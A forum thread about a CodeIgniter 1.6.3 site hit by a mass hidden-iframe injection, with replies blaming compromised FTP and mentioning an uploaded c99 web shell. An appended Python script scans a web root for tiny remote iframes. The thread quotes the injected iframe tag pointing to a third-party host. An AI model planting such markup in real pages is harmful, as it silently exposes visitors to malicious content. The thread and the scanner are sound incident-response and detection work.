hacked again .. iframe injection CI 1.6.3 !!

#1
[eluser]Unknown[/eluser]
Hello everyone. My customer is running a website developed in CI version 1.6.3. Recently the website got a massive iframe injection.

Code:
<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2230488"></iframe>

All the PHP files are injected with it, and new index.html files are created in each directory. Despite my shouts, the developers failed to change $config['global_xss_filtering'] = false; to true. Could that have prevented this situation?

Where should I start to find the root cause where the injection started?

Thanks

#2
[eluser]davidbehler[/eluser]
Hacked ftp access?

#3
[eluser]Unknown[/eluser]
[quote author="waldmeister" date="1298820387"]Hacked ftp access?[/quote]

Yes, it looks like it. Here is the gentleman .. 213.246.45.102. Later on c99 was uploaded and the DB was compromised.

#4
[eluser]Phil Sturgeon[/eluser]
Disable FTP and use SFTP or start SSHing your code online with rsync or Git.

While you're at it, enable XSS protection and upgrade to CodeIgniter 1.7.3 at least (will be an easier jump than going to 2.0).

That should take care of your security concerns.
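Added example, not part of the original thread: one way to start on the question in post #1 is to list every file under the web root that carries a near-invisible remote iframe, oldest modification first, so the earliest timestamp can be compared with the FTP log. The extensions scanned, the `injected.example` sample host and the function names are assumptions of this sketch.

```python
import os, re, sys, tempfile
from datetime import datetime, timezone

IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.I)
# 0- or 1-pixel dimension; "heigth" covers the misspelled attribute in the payload from post #1.
TINY_RE = re.compile(
    rb"\b(?:width|height|heigth)\s*=\s*[\"']?[01](?:px)?[\"']?(?=[\s>/])", re.I)
SRC_RE = re.compile(rb"\bsrc\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)

def hidden_iframes(data):
    """Return the src URLs of iframes that are both tiny and remote."""
    hits = []
    for tag in IFRAME_RE.findall(data):
        src = SRC_RE.search(tag)
        if src and TINY_RE.search(tag):
            hits.append(src.group(1).decode("ascii", "replace"))
    return hits

def scan(webroot, exts=(".php", ".html", ".htm", ".js")):
    """Walk webroot; return (mtime, path, urls) per flagged file, oldest first."""
    found = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    urls = hidden_iframes(fh.read())
                if urls:
                    found.append((os.stat(path).st_mtime, path, urls))
            except OSError:
                continue  # unreadable file: skip it, keep scanning
    return sorted(found)

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else tempfile.mkdtemp()
    if len(sys.argv) < 2:  # no path given: scan one constructed sample file
        with open(os.path.join(root, "index.html"), "wb") as fh:
            fh.write(b'<iframe heigth="1" width="1" '
                     b'src="http://injected.example/t.php"></iframe>')
    for mtime, path, urls in scan(root):
        stamp = datetime.fromtimestamp(mtime, timezone.utc).isoformat()
        print(stamp, path, ", ".join(urls))
```

File modification times can be reset by whoever wrote the files, so the earliest timestamp is a starting window for reading the FTP log rather than proof of when the first write happened.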

